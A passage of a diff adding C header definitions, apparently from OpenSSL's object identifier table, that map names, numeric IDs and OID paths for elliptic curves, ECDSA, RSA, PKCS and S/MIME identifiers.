+#define OBJ_X9_62_id_characteristic_two_basis		OBJ_X9_62_characteristic_two_field,3L
+
+#define SN_X9_62_onBasis		"onBasis"
+#define NID_X9_62_onBasis		681
+#define OBJ_X9_62_onBasis		OBJ_X9_62_id_characteristic_two_basis,1L
+
+#define SN_X9_62_tpBasis		"tpBasis"
+#define NID_X9_62_tpBasis		682
+#define OBJ_X9_62_tpBasis		OBJ_X9_62_id_characteristic_two_basis,2L
+
+#define SN_X9_62_ppBasis		"ppBasis"
+#define NID_X9_62_ppBasis		683
+#define OBJ_X9_62_ppBasis		OBJ_X9_62_id_characteristic_two_basis,3L
+
+#define OBJ_X9_62_id_publicKeyType		OBJ_ansi_X9_62,2L
+
+#define SN_X9_62_id_ecPublicKey		"id-ecPublicKey"
+#define NID_X9_62_id_ecPublicKey		408
+#define OBJ_X9_62_id_ecPublicKey		OBJ_X9_62_id_publicKeyType,1L
+
+#define OBJ_X9_62_ellipticCurve		OBJ_ansi_X9_62,3L
+
+#define OBJ_X9_62_c_TwoCurve		OBJ_X9_62_ellipticCurve,0L
+
+#define SN_X9_62_c2pnb163v1		"c2pnb163v1"
+#define NID_X9_62_c2pnb163v1		684
+#define OBJ_X9_62_c2pnb163v1		OBJ_X9_62_c_TwoCurve,1L
+
+#define SN_X9_62_c2pnb163v2		"c2pnb163v2"
+#define NID_X9_62_c2pnb163v2		685
+#define OBJ_X9_62_c2pnb163v2		OBJ_X9_62_c_TwoCurve,2L
+
+#define SN_X9_62_c2pnb163v3		"c2pnb163v3"
+#define NID_X9_62_c2pnb163v3		686
+#define OBJ_X9_62_c2pnb163v3		OBJ_X9_62_c_TwoCurve,3L
+
+#define SN_X9_62_c2pnb176v1		"c2pnb176v1"
+#define NID_X9_62_c2pnb176v1		687
+#define OBJ_X9_62_c2pnb176v1		OBJ_X9_62_c_TwoCurve,4L
+
+#define SN_X9_62_c2tnb191v1		"c2tnb191v1"
+#define NID_X9_62_c2tnb191v1		688
+#define OBJ_X9_62_c2tnb191v1		OBJ_X9_62_c_TwoCurve,5L
+
+#define SN_X9_62_c2tnb191v2		"c2tnb191v2"
+#define NID_X9_62_c2tnb191v2		689
+#define OBJ_X9_62_c2tnb191v2		OBJ_X9_62_c_TwoCurve,6L
+
+#define SN_X9_62_c2tnb191v3		"c2tnb191v3"
+#define NID_X9_62_c2tnb191v3		690
+#define OBJ_X9_62_c2tnb191v3		OBJ_X9_62_c_TwoCurve,7L
+
+#define SN_X9_62_c2onb191v4		"c2onb191v4"
+#define NID_X9_62_c2onb191v4		691
+#define OBJ_X9_62_c2onb191v4		OBJ_X9_62_c_TwoCurve,8L
+
+#define SN_X9_62_c2onb191v5		"c2onb191v5"
+#define NID_X9_62_c2onb191v5		692
+#define OBJ_X9_62_c2onb191v5		OBJ_X9_62_c_TwoCurve,9L
+
+#define SN_X9_62_c2pnb208w1		"c2pnb208w1"
+#define NID_X9_62_c2pnb208w1		693
+#define OBJ_X9_62_c2pnb208w1		OBJ_X9_62_c_TwoCurve,10L
+
+#define SN_X9_62_c2tnb239v1		"c2tnb239v1"
+#define NID_X9_62_c2tnb239v1		694
+#define OBJ_X9_62_c2tnb239v1		OBJ_X9_62_c_TwoCurve,11L
+
+#define SN_X9_62_c2tnb239v2		"c2tnb239v2"
+#define NID_X9_62_c2tnb239v2		695
+#define OBJ_X9_62_c2tnb239v2		OBJ_X9_62_c_TwoCurve,12L
+
+#define SN_X9_62_c2tnb239v3		"c2tnb239v3"
+#define NID_X9_62_c2tnb239v3		696
+#define OBJ_X9_62_c2tnb239v3		OBJ_X9_62_c_TwoCurve,13L
+
+#define SN_X9_62_c2onb239v4		"c2onb239v4"
+#define NID_X9_62_c2onb239v4		697
+#define OBJ_X9_62_c2onb239v4		OBJ_X9_62_c_TwoCurve,14L
+
+#define SN_X9_62_c2onb239v5		"c2onb239v5"
+#define NID_X9_62_c2onb239v5		698
+#define OBJ_X9_62_c2onb239v5		OBJ_X9_62_c_TwoCurve,15L
+
+#define SN_X9_62_c2pnb272w1		"c2pnb272w1"
+#define NID_X9_62_c2pnb272w1		699
+#define OBJ_X9_62_c2pnb272w1		OBJ_X9_62_c_TwoCurve,16L
+
+#define SN_X9_62_c2pnb304w1		"c2pnb304w1"
+#define NID_X9_62_c2pnb304w1		700
+#define OBJ_X9_62_c2pnb304w1		OBJ_X9_62_c_TwoCurve,17L
+
+#define SN_X9_62_c2tnb359v1		"c2tnb359v1"
+#define NID_X9_62_c2tnb359v1		701
+#define OBJ_X9_62_c2tnb359v1		OBJ_X9_62_c_TwoCurve,18L
+
+#define SN_X9_62_c2pnb368w1		"c2pnb368w1"
+#define NID_X9_62_c2pnb368w1		702
+#define OBJ_X9_62_c2pnb368w1		OBJ_X9_62_c_TwoCurve,19L
+
+#define SN_X9_62_c2tnb431r1		"c2tnb431r1"
+#define NID_X9_62_c2tnb431r1		703
+#define OBJ_X9_62_c2tnb431r1		OBJ_X9_62_c_TwoCurve,20L
+
+#define OBJ_X9_62_primeCurve		OBJ_X9_62_ellipticCurve,1L
+
+#define SN_X9_62_prime192v1		"prime192v1"
+#define NID_X9_62_prime192v1		409
+#define OBJ_X9_62_prime192v1		OBJ_X9_62_primeCurve,1L
+
+#define SN_X9_62_prime192v2		"prime192v2"
+#define NID_X9_62_prime192v2		410
+#define OBJ_X9_62_prime192v2		OBJ_X9_62_primeCurve,2L
+
+#define SN_X9_62_prime192v3		"prime192v3"
+#define NID_X9_62_prime192v3		411
+#define OBJ_X9_62_prime192v3		OBJ_X9_62_primeCurve,3L
+
+#define SN_X9_62_prime239v1		"prime239v1"
+#define NID_X9_62_prime239v1		412
+#define OBJ_X9_62_prime239v1		OBJ_X9_62_primeCurve,4L
+
+#define SN_X9_62_prime239v2		"prime239v2"
+#define NID_X9_62_prime239v2		413
+#define OBJ_X9_62_prime239v2		OBJ_X9_62_primeCurve,5L
+
+#define SN_X9_62_prime239v3		"prime239v3"
+#define NID_X9_62_prime239v3		414
+#define OBJ_X9_62_prime239v3		OBJ_X9_62_primeCurve,6L
+
+#define SN_X9_62_prime256v1		"prime256v1"
+#define NID_X9_62_prime256v1		415
+#define OBJ_X9_62_prime256v1		OBJ_X9_62_primeCurve,7L
+
+#define OBJ_X9_62_id_ecSigType		OBJ_ansi_X9_62,4L
+
+#define SN_ecdsa_with_SHA1		"ecdsa-with-SHA1"
+#define NID_ecdsa_with_SHA1		416
+#define OBJ_ecdsa_with_SHA1		OBJ_X9_62_id_ecSigType,1L
+
+#define SN_ecdsa_with_Recommended		"ecdsa-with-Recommended"
+#define NID_ecdsa_with_Recommended		791
+#define OBJ_ecdsa_with_Recommended		OBJ_X9_62_id_ecSigType,2L
+
+#define SN_ecdsa_with_Specified		"ecdsa-with-Specified"
+#define NID_ecdsa_with_Specified		792
+#define OBJ_ecdsa_with_Specified		OBJ_X9_62_id_ecSigType,3L
+
+#define SN_ecdsa_with_SHA224		"ecdsa-with-SHA224"
+#define NID_ecdsa_with_SHA224		793
+#define OBJ_ecdsa_with_SHA224		OBJ_ecdsa_with_Specified,1L
+
+#define SN_ecdsa_with_SHA256		"ecdsa-with-SHA256"
+#define NID_ecdsa_with_SHA256		794
+#define OBJ_ecdsa_with_SHA256		OBJ_ecdsa_with_Specified,2L
+
+#define SN_ecdsa_with_SHA384		"ecdsa-with-SHA384"
+#define NID_ecdsa_with_SHA384		795
+#define OBJ_ecdsa_with_SHA384		OBJ_ecdsa_with_Specified,3L
+
+#define SN_ecdsa_with_SHA512		"ecdsa-with-SHA512"
+#define NID_ecdsa_with_SHA512		796
+#define OBJ_ecdsa_with_SHA512		OBJ_ecdsa_with_Specified,4L
+
+#define OBJ_secg_ellipticCurve		OBJ_certicom_arc,0L
+
+#define SN_secp112r1		"secp112r1"
+#define NID_secp112r1		704
+#define OBJ_secp112r1		OBJ_secg_ellipticCurve,6L
+
+#define SN_secp112r2		"secp112r2"
+#define NID_secp112r2		705
+#define OBJ_secp112r2		OBJ_secg_ellipticCurve,7L
+
+#define SN_secp128r1		"secp128r1"
+#define NID_secp128r1		706
+#define OBJ_secp128r1		OBJ_secg_ellipticCurve,28L
+
+#define SN_secp128r2		"secp128r2"
+#define NID_secp128r2		707
+#define OBJ_secp128r2		OBJ_secg_ellipticCurve,29L
+
+#define SN_secp160k1		"secp160k1"
+#define NID_secp160k1		708
+#define OBJ_secp160k1		OBJ_secg_ellipticCurve,9L
+
+#define SN_secp160r1		"secp160r1"
+#define NID_secp160r1		709
+#define OBJ_secp160r1		OBJ_secg_ellipticCurve,8L
+
+#define SN_secp160r2		"secp160r2"
+#define NID_secp160r2		710
+#define OBJ_secp160r2		OBJ_secg_ellipticCurve,30L
+
+#define SN_secp192k1		"secp192k1"
+#define NID_secp192k1		711
+#define OBJ_secp192k1		OBJ_secg_ellipticCurve,31L
+
+#define SN_secp224k1		"secp224k1"
+#define NID_secp224k1		712
+#define OBJ_secp224k1		OBJ_secg_ellipticCurve,32L
+
+#define SN_secp224r1		"secp224r1"
+#define NID_secp224r1		713
+#define OBJ_secp224r1		OBJ_secg_ellipticCurve,33L
+
+#define SN_secp256k1		"secp256k1"
+#define NID_secp256k1		714
+#define OBJ_secp256k1		OBJ_secg_ellipticCurve,10L
+
+#define SN_secp384r1		"secp384r1"
+#define NID_secp384r1		715
+#define OBJ_secp384r1		OBJ_secg_ellipticCurve,34L
+
+#define SN_secp521r1		"secp521r1"
+#define NID_secp521r1		716
+#define OBJ_secp521r1		OBJ_secg_ellipticCurve,35L
+
+#define SN_sect113r1		"sect113r1"
+#define NID_sect113r1		717
+#define OBJ_sect113r1		OBJ_secg_ellipticCurve,4L
+
+#define SN_sect113r2		"sect113r2"
+#define NID_sect113r2		718
+#define OBJ_sect113r2		OBJ_secg_ellipticCurve,5L
+
+#define SN_sect131r1		"sect131r1"
+#define NID_sect131r1		719
+#define OBJ_sect131r1		OBJ_secg_ellipticCurve,22L
+
+#define SN_sect131r2		"sect131r2"
+#define NID_sect131r2		720
+#define OBJ_sect131r2		OBJ_secg_ellipticCurve,23L
+
+#define SN_sect163k1		"sect163k1"
+#define NID_sect163k1		721
+#define OBJ_sect163k1		OBJ_secg_ellipticCurve,1L
+
+#define SN_sect163r1		"sect163r1"
+#define NID_sect163r1		722
+#define OBJ_sect163r1		OBJ_secg_ellipticCurve,2L
+
+#define SN_sect163r2		"sect163r2"
+#define NID_sect163r2		723
+#define OBJ_sect163r2		OBJ_secg_ellipticCurve,15L
+
+#define SN_sect193r1		"sect193r1"
+#define NID_sect193r1		724
+#define OBJ_sect193r1		OBJ_secg_ellipticCurve,24L
+
+#define SN_sect193r2		"sect193r2"
+#define NID_sect193r2		725
+#define OBJ_sect193r2		OBJ_secg_ellipticCurve,25L
+
+#define SN_sect233k1		"sect233k1"
+#define NID_sect233k1		726
+#define OBJ_sect233k1		OBJ_secg_ellipticCurve,26L
+
+#define SN_sect233r1		"sect233r1"
+#define NID_sect233r1		727
+#define OBJ_sect233r1		OBJ_secg_ellipticCurve,27L
+
+#define SN_sect239k1		"sect239k1"
+#define NID_sect239k1		728
+#define OBJ_sect239k1		OBJ_secg_ellipticCurve,3L
+
+#define SN_sect283k1		"sect283k1"
+#define NID_sect283k1		729
+#define OBJ_sect283k1		OBJ_secg_ellipticCurve,16L
+
+#define SN_sect283r1		"sect283r1"
+#define NID_sect283r1		730
+#define OBJ_sect283r1		OBJ_secg_ellipticCurve,17L
+
+#define SN_sect409k1		"sect409k1"
+#define NID_sect409k1		731
+#define OBJ_sect409k1		OBJ_secg_ellipticCurve,36L
+
+#define SN_sect409r1		"sect409r1"
+#define NID_sect409r1		732
+#define OBJ_sect409r1		OBJ_secg_ellipticCurve,37L
+
+#define SN_sect571k1		"sect571k1"
+#define NID_sect571k1		733
+#define OBJ_sect571k1		OBJ_secg_ellipticCurve,38L
+
+#define SN_sect571r1		"sect571r1"
+#define NID_sect571r1		734
+#define OBJ_sect571r1		OBJ_secg_ellipticCurve,39L
+
+#define OBJ_wap_wsg_idm_ecid		OBJ_wap_wsg,4L
+
+#define SN_wap_wsg_idm_ecid_wtls1		"wap-wsg-idm-ecid-wtls1"
+#define NID_wap_wsg_idm_ecid_wtls1		735
+#define OBJ_wap_wsg_idm_ecid_wtls1		OBJ_wap_wsg_idm_ecid,1L
+
+#define SN_wap_wsg_idm_ecid_wtls3		"wap-wsg-idm-ecid-wtls3"
+#define NID_wap_wsg_idm_ecid_wtls3		736
+#define OBJ_wap_wsg_idm_ecid_wtls3		OBJ_wap_wsg_idm_ecid,3L
+
+#define SN_wap_wsg_idm_ecid_wtls4		"wap-wsg-idm-ecid-wtls4"
+#define NID_wap_wsg_idm_ecid_wtls4		737
+#define OBJ_wap_wsg_idm_ecid_wtls4		OBJ_wap_wsg_idm_ecid,4L
+
+#define SN_wap_wsg_idm_ecid_wtls5		"wap-wsg-idm-ecid-wtls5"
+#define NID_wap_wsg_idm_ecid_wtls5		738
+#define OBJ_wap_wsg_idm_ecid_wtls5		OBJ_wap_wsg_idm_ecid,5L
+
+#define SN_wap_wsg_idm_ecid_wtls6		"wap-wsg-idm-ecid-wtls6"
+#define NID_wap_wsg_idm_ecid_wtls6		739
+#define OBJ_wap_wsg_idm_ecid_wtls6		OBJ_wap_wsg_idm_ecid,6L
+
+#define SN_wap_wsg_idm_ecid_wtls7		"wap-wsg-idm-ecid-wtls7"
+#define NID_wap_wsg_idm_ecid_wtls7		740
+#define OBJ_wap_wsg_idm_ecid_wtls7		OBJ_wap_wsg_idm_ecid,7L
+
+#define SN_wap_wsg_idm_ecid_wtls8		"wap-wsg-idm-ecid-wtls8"
+#define NID_wap_wsg_idm_ecid_wtls8		741
+#define OBJ_wap_wsg_idm_ecid_wtls8		OBJ_wap_wsg_idm_ecid,8L
+
+#define SN_wap_wsg_idm_ecid_wtls9		"wap-wsg-idm-ecid-wtls9"
+#define NID_wap_wsg_idm_ecid_wtls9		742
+#define OBJ_wap_wsg_idm_ecid_wtls9		OBJ_wap_wsg_idm_ecid,9L
+
+#define SN_wap_wsg_idm_ecid_wtls10		"wap-wsg-idm-ecid-wtls10"
+#define NID_wap_wsg_idm_ecid_wtls10		743
+#define OBJ_wap_wsg_idm_ecid_wtls10		OBJ_wap_wsg_idm_ecid,10L
+
+#define SN_wap_wsg_idm_ecid_wtls11		"wap-wsg-idm-ecid-wtls11"
+#define NID_wap_wsg_idm_ecid_wtls11		744
+#define OBJ_wap_wsg_idm_ecid_wtls11		OBJ_wap_wsg_idm_ecid,11L
+
+#define SN_wap_wsg_idm_ecid_wtls12		"wap-wsg-idm-ecid-wtls12"
+#define NID_wap_wsg_idm_ecid_wtls12		745
+#define OBJ_wap_wsg_idm_ecid_wtls12		OBJ_wap_wsg_idm_ecid,12L
+
+#define SN_cast5_cbc		"CAST5-CBC"
+#define LN_cast5_cbc		"cast5-cbc"
+#define NID_cast5_cbc		108
+#define OBJ_cast5_cbc		OBJ_ISO_US,113533L,7L,66L,10L
+
+#define SN_cast5_ecb		"CAST5-ECB"
+#define LN_cast5_ecb		"cast5-ecb"
+#define NID_cast5_ecb		109
+
+#define SN_cast5_cfb64		"CAST5-CFB"
+#define LN_cast5_cfb64		"cast5-cfb"
+#define NID_cast5_cfb64		110
+
+#define SN_cast5_ofb64		"CAST5-OFB"
+#define LN_cast5_ofb64		"cast5-ofb"
+#define NID_cast5_ofb64		111
+
+#define LN_pbeWithMD5AndCast5_CBC		"pbeWithMD5AndCast5CBC"
+#define NID_pbeWithMD5AndCast5_CBC		112
+#define OBJ_pbeWithMD5AndCast5_CBC		OBJ_ISO_US,113533L,7L,66L,12L
+
+#define SN_id_PasswordBasedMAC		"id-PasswordBasedMAC"
+#define LN_id_PasswordBasedMAC		"password based MAC"
+#define NID_id_PasswordBasedMAC		782
+#define OBJ_id_PasswordBasedMAC		OBJ_ISO_US,113533L,7L,66L,13L
+
+#define SN_id_DHBasedMac		"id-DHBasedMac"
+#define LN_id_DHBasedMac		"Diffie-Hellman based MAC"
+#define NID_id_DHBasedMac		783
+#define OBJ_id_DHBasedMac		OBJ_ISO_US,113533L,7L,66L,30L
+
+#define SN_rsadsi		"rsadsi"
+#define LN_rsadsi		"RSA Data Security, Inc."
+#define NID_rsadsi		1
+#define OBJ_rsadsi		OBJ_ISO_US,113549L
+
+#define SN_pkcs		"pkcs"
+#define LN_pkcs		"RSA Data Security, Inc. PKCS"
+#define NID_pkcs		2
+#define OBJ_pkcs		OBJ_rsadsi,1L
+
+#define SN_pkcs1		"pkcs1"
+#define NID_pkcs1		186
+#define OBJ_pkcs1		OBJ_pkcs,1L
+
+#define LN_rsaEncryption		"rsaEncryption"
+#define NID_rsaEncryption		6
+#define OBJ_rsaEncryption		OBJ_pkcs1,1L
+
+#define SN_md2WithRSAEncryption		"RSA-MD2"
+#define LN_md2WithRSAEncryption		"md2WithRSAEncryption"
+#define NID_md2WithRSAEncryption		7
+#define OBJ_md2WithRSAEncryption		OBJ_pkcs1,2L
+
+#define SN_md4WithRSAEncryption		"RSA-MD4"
+#define LN_md4WithRSAEncryption		"md4WithRSAEncryption"
+#define NID_md4WithRSAEncryption		396
+#define OBJ_md4WithRSAEncryption		OBJ_pkcs1,3L
+
+#define SN_md5WithRSAEncryption		"RSA-MD5"
+#define LN_md5WithRSAEncryption		"md5WithRSAEncryption"
+#define NID_md5WithRSAEncryption		8
+#define OBJ_md5WithRSAEncryption		OBJ_pkcs1,4L
+
+#define SN_sha1WithRSAEncryption		"RSA-SHA1"
+#define LN_sha1WithRSAEncryption		"sha1WithRSAEncryption"
+#define NID_sha1WithRSAEncryption		65
+#define OBJ_sha1WithRSAEncryption		OBJ_pkcs1,5L
+
+#define SN_rsaesOaep		"RSAES-OAEP"
+#define LN_rsaesOaep		"rsaesOaep"
+#define NID_rsaesOaep		919
+#define OBJ_rsaesOaep		OBJ_pkcs1,7L
+
+#define SN_mgf1		"MGF1"
+#define LN_mgf1		"mgf1"
+#define NID_mgf1		911
+#define OBJ_mgf1		OBJ_pkcs1,8L
+
+#define SN_pSpecified		"PSPECIFIED"
+#define LN_pSpecified		"pSpecified"
+#define NID_pSpecified		935
+#define OBJ_pSpecified		OBJ_pkcs1,9L
+
+#define SN_rsassaPss		"RSASSA-PSS"
+#define LN_rsassaPss		"rsassaPss"
+#define NID_rsassaPss		912
+#define OBJ_rsassaPss		OBJ_pkcs1,10L
+
+#define SN_sha256WithRSAEncryption		"RSA-SHA256"
+#define LN_sha256WithRSAEncryption		"sha256WithRSAEncryption"
+#define NID_sha256WithRSAEncryption		668
+#define OBJ_sha256WithRSAEncryption		OBJ_pkcs1,11L
+
+#define SN_sha384WithRSAEncryption		"RSA-SHA384"
+#define LN_sha384WithRSAEncryption		"sha384WithRSAEncryption"
+#define NID_sha384WithRSAEncryption		669
+#define OBJ_sha384WithRSAEncryption		OBJ_pkcs1,12L
+
+#define SN_sha512WithRSAEncryption		"RSA-SHA512"
+#define LN_sha512WithRSAEncryption		"sha512WithRSAEncryption"
+#define NID_sha512WithRSAEncryption		670
+#define OBJ_sha512WithRSAEncryption		OBJ_pkcs1,13L
+
+#define SN_sha224WithRSAEncryption		"RSA-SHA224"
+#define LN_sha224WithRSAEncryption		"sha224WithRSAEncryption"
+#define NID_sha224WithRSAEncryption		671
+#define OBJ_sha224WithRSAEncryption		OBJ_pkcs1,14L
+
+#define SN_pkcs3		"pkcs3"
+#define NID_pkcs3		27
+#define OBJ_pkcs3		OBJ_pkcs,3L
+
+#define LN_dhKeyAgreement		"dhKeyAgreement"
+#define NID_dhKeyAgreement		28
+#define OBJ_dhKeyAgreement		OBJ_pkcs3,1L
+
+#define SN_pkcs5		"pkcs5"
+#define NID_pkcs5		187
+#define OBJ_pkcs5		OBJ_pkcs,5L
+
+#define SN_pbeWithMD2AndDES_CBC		"PBE-MD2-DES"
+#define LN_pbeWithMD2AndDES_CBC		"pbeWithMD2AndDES-CBC"
+#define NID_pbeWithMD2AndDES_CBC		9
+#define OBJ_pbeWithMD2AndDES_CBC		OBJ_pkcs5,1L
+
+#define SN_pbeWithMD5AndDES_CBC		"PBE-MD5-DES"
+#define LN_pbeWithMD5AndDES_CBC		"pbeWithMD5AndDES-CBC"
+#define NID_pbeWithMD5AndDES_CBC		10
+#define OBJ_pbeWithMD5AndDES_CBC		OBJ_pkcs5,3L
+
+#define SN_pbeWithMD2AndRC2_CBC		"PBE-MD2-RC2-64"
+#define LN_pbeWithMD2AndRC2_CBC		"pbeWithMD2AndRC2-CBC"
+#define NID_pbeWithMD2AndRC2_CBC		168
+#define OBJ_pbeWithMD2AndRC2_CBC		OBJ_pkcs5,4L
+
+#define SN_pbeWithMD5AndRC2_CBC		"PBE-MD5-RC2-64"
+#define LN_pbeWithMD5AndRC2_CBC		"pbeWithMD5AndRC2-CBC"
+#define NID_pbeWithMD5AndRC2_CBC		169
+#define OBJ_pbeWithMD5AndRC2_CBC		OBJ_pkcs5,6L
+
+#define SN_pbeWithSHA1AndDES_CBC		"PBE-SHA1-DES"
+#define LN_pbeWithSHA1AndDES_CBC		"pbeWithSHA1AndDES-CBC"
+#define NID_pbeWithSHA1AndDES_CBC		170
+#define OBJ_pbeWithSHA1AndDES_CBC		OBJ_pkcs5,10L
+
+#define SN_pbeWithSHA1AndRC2_CBC		"PBE-SHA1-RC2-64"
+#define LN_pbeWithSHA1AndRC2_CBC		"pbeWithSHA1AndRC2-CBC"
+#define NID_pbeWithSHA1AndRC2_CBC		68
+#define OBJ_pbeWithSHA1AndRC2_CBC		OBJ_pkcs5,11L
+
+#define LN_id_pbkdf2		"PBKDF2"
+#define NID_id_pbkdf2		69
+#define OBJ_id_pbkdf2		OBJ_pkcs5,12L
+
+#define LN_pbes2		"PBES2"
+#define NID_pbes2		161
+#define OBJ_pbes2		OBJ_pkcs5,13L
+
+#define LN_pbmac1		"PBMAC1"
+#define NID_pbmac1		162
+#define OBJ_pbmac1		OBJ_pkcs5,14L
+
+#define SN_pkcs7		"pkcs7"
+#define NID_pkcs7		20
+#define OBJ_pkcs7		OBJ_pkcs,7L
+
+#define LN_pkcs7_data		"pkcs7-data"
+#define NID_pkcs7_data		21
+#define OBJ_pkcs7_data		OBJ_pkcs7,1L
+
+#define LN_pkcs7_signed		"pkcs7-signedData"
+#define NID_pkcs7_signed		22
+#define OBJ_pkcs7_signed		OBJ_pkcs7,2L
+
+#define LN_pkcs7_enveloped		"pkcs7-envelopedData"
+#define NID_pkcs7_enveloped		23
+#define OBJ_pkcs7_enveloped		OBJ_pkcs7,3L
+
+#define LN_pkcs7_signedAndEnveloped		"pkcs7-signedAndEnvelopedData"
+#define NID_pkcs7_signedAndEnveloped		24
+#define OBJ_pkcs7_signedAndEnveloped		OBJ_pkcs7,4L
+
+#define LN_pkcs7_digest		"pkcs7-digestData"
+#define NID_pkcs7_digest		25
+#define OBJ_pkcs7_digest		OBJ_pkcs7,5L
+
+#define LN_pkcs7_encrypted		"pkcs7-encryptedData"
+#define NID_pkcs7_encrypted		26
+#define OBJ_pkcs7_encrypted		OBJ_pkcs7,6L
+
+#define SN_pkcs9		"pkcs9"
+#define NID_pkcs9		47
+#define OBJ_pkcs9		OBJ_pkcs,9L
+
+#define LN_pkcs9_emailAddress		"emailAddress"
+#define NID_pkcs9_emailAddress		48
+#define OBJ_pkcs9_emailAddress		OBJ_pkcs9,1L
+
+#define LN_pkcs9_unstructuredName		"unstructuredName"
+#define NID_pkcs9_unstructuredName		49
+#define OBJ_pkcs9_unstructuredName		OBJ_pkcs9,2L
+
+#define LN_pkcs9_contentType		"contentType"
+#define NID_pkcs9_contentType		50
+#define OBJ_pkcs9_contentType		OBJ_pkcs9,3L
+
+#define LN_pkcs9_messageDigest		"messageDigest"
+#define NID_pkcs9_messageDigest		51
+#define OBJ_pkcs9_messageDigest		OBJ_pkcs9,4L
+
+#define LN_pkcs9_signingTime		"signingTime"
+#define NID_pkcs9_signingTime		52
+#define OBJ_pkcs9_signingTime		OBJ_pkcs9,5L
+
+#define LN_pkcs9_countersignature		"countersignature"
+#define NID_pkcs9_countersignature		53
+#define OBJ_pkcs9_countersignature		OBJ_pkcs9,6L
+
+#define LN_pkcs9_challengePassword		"challengePassword"
+#define NID_pkcs9_challengePassword		54
+#define OBJ_pkcs9_challengePassword		OBJ_pkcs9,7L
+
+#define LN_pkcs9_unstructuredAddress		"unstructuredAddress"
+#define NID_pkcs9_unstructuredAddress		55
+#define OBJ_pkcs9_unstructuredAddress		OBJ_pkcs9,8L
+
+#define LN_pkcs9_extCertAttributes		"extendedCertificateAttributes"
+#define NID_pkcs9_extCertAttributes		56
+#define OBJ_pkcs9_extCertAttributes		OBJ_pkcs9,9L
+
+#define SN_ext_req		"extReq"
+#define LN_ext_req		"Extension Request"
+#define NID_ext_req		172
+#define OBJ_ext_req		OBJ_pkcs9,14L
+
+#define SN_SMIMECapabilities		"SMIME-CAPS"
+#define LN_SMIMECapabilities		"S/MIME Capabilities"
+#define NID_SMIMECapabilities		167
+#define OBJ_SMIMECapabilities		OBJ_pkcs9,15L
+
+#define SN_SMIME		"SMIME"
+#define LN_SMIME		"S/MIME"
+#define NID_SMIME		188
+#define OBJ_SMIME		OBJ_pkcs9,16L
+
+#define SN_id_smime_mod		"id-smime-mod"
+#define NID_id_smime_mod		189
+#define OBJ_id_smime_mod		OBJ_SMIME,0L
+
+#define SN_id_smime_ct		"id-smime-ct"
+#define NID_id_smime_ct		190
+#define OBJ_id_smime_ct		OBJ_SMIME,1L
+
+#define SN_id_smime_aa		"id-smime-aa"
+#define NID_id_smime_aa		191
+#define OBJ_id_smime_aa		OBJ_SMIME,2L
+
+#define SN_id_smime_alg		"id-smime-alg"
+#define NID_id_smime_alg		192
+#define OBJ_id_smime_alg		OBJ_SMIME,3L
+
+#define SN_id_smime_cd		"id-smime-cd"
+#define NID_id_smime_cd		193
+#define OBJ_id_smime_cd		OBJ_SMIME,4L
+
+#define SN_id_smime_spq		"id-smime-spq"
+#define NID_id_smime_spq		194
+#define OBJ_id_smime_spq		OBJ_SMIME,5L
+
+#define SN_id_smime_cti		"id-smime-cti"
+#define NID_id_smime_cti		195
+#define OBJ_id_smime_cti		OBJ_SMIME,6L
+
+#define SN_id_smime_mod_cms		"id-smime-mod-cms"
+#define NID_id_smime_mod_cms		196
+#define OBJ_id_smime_mod_cms		OBJ_id_smime_mod,1L
+
+#define SN_id_smime_mod_ess		"id-smime-mod-ess"
+#define NID_id_smime_mod_ess		197
+#define OBJ_id_smime_mod_ess		OBJ_id_smime_mod,2L
+
+#define SN_id_smime_mod_oid		"id-smime-mod-oid"
+#define NID_id_smime_mod_oid		198
+#define OBJ_id_smime_mod_oid		OBJ_id_smime_mod,3L
+
+#define SN_id_smime_mod_msg_v3		"id-smime-mod-msg-v3"
+#define NID_id_smime_mod_msg_v3		199
+#define OBJ_id_smime_mod_msg_v3		OBJ_id_smime_mod,4L
+
+#define SN_id_smime_mod_ets_eSignature_88		"id-smime-mod-ets-eSignature-88"
+#define NID_id_smime_mod_ets_eSignature_88		200
+#define OBJ_id_smime_mod_ets_eSignature_88		OBJ_id_smime_mod,5L
+
+#define SN_id_smime_mod_ets_eSignature_97		"id-smime-mod-ets-eSignature-97"
+#define NID_id_smime_mod_ets_eSignature_97		201
+#define OBJ_id_smime_mod_ets_eSignature_97		OBJ_id_smime_mod,6L
+
+#define SN_id_smime_mod_ets_eSigPolicy_88		"id-smime-mod-ets-eSigPolicy-88"
+#define NID_id_smime_mod_ets_eSigPolicy_88		202
+#define OBJ_id_smime_mod_ets_eSigPolicy_88		OBJ_id_smime_mod,7L
+
+#define SN_id_smime_mod_ets_eSigPolicy_97		"id-smime-mod-ets-eSigPolicy-97"
+#define NID_id_smime_mod_ets_eSigPolicy_97		203
+#define OBJ_id_smime_mod_ets_eSigPolicy_97		OBJ_id_smime_mod,8L
+
+#define SN_id_smime_ct_receipt		"id-smime-ct-receipt"
+#define NID_id_smime_ct_receipt		204
+#define OBJ_id_smime_ct_receipt		OBJ_id_smime_ct,1L
+
+#define SN_id_smime_ct_authData		"id-smime-ct-authData"
+#define NID_id_smime_ct_authData		205
+#define OBJ_id_smime_ct_authData		OBJ_id_smime_ct,2L
+
+#define SN_id_smime_ct_publishCert		"id-smime-ct-publishCert"
+#define NID_id_smime_ct_publishCert		206
+#define OBJ_id_smime_ct_publishCert		OBJ_id_smime_ct,3L
+
+#define SN_id_smime_ct_TSTInfo		"id-smime-ct-TSTInfo"
+#define NID_id_smime_ct_TSTInfo		207
+#define OBJ_id_smime_ct_TSTInfo		OBJ_id_smime_ct,4L
+
+#define SN_id_smime_ct_TDTInfo		"id-smime-ct-TDTInfo"
+#define NID_id_smime_ct_TDTInfo		208
+#define OBJ_id_smime_ct_TDTInfo		OBJ_id_smime_ct,5L
+
+#define SN_id_smime_ct_contentInfo		"id-smime-ct-contentInfo"
+#define NID_id_smime_ct_contentInfo		209
+#define OBJ_id_smime_ct_contentInfo		OBJ_id_smime_ct,6L
+
+#define SN_id_smime_ct_DVCSRequestData		"id-smime-ct-DVCSRequestData"
+#define NID_id_smime_ct_DVCSRequestData		210
+#define OBJ_id_smime_ct_DVCSRequestData		OBJ_id_smime_ct,7L
+
+#define SN_id_smime_ct_DVCSResponseData		"id-smime-ct-DVCSResponseData"
+#define NID_id_smime_ct_DVCSResponseData		211
+#define OBJ_id_smime_ct_DVCSResponseData		OBJ_id_smime_ct,8L
+
+#define SN_id_smime_ct_compressedData		"id-smime-ct-compressedData"
+#define NID_id_smime_ct_compressedData		786
+#define OBJ_id_smime_ct_compressedData		OBJ_id_smime_ct,9L
+
+#define SN_id_ct_asciiTextWithCRLF		"id-ct-asciiTextWithCRLF"
+#define NID_id_ct_asciiTextWithCRLF		787
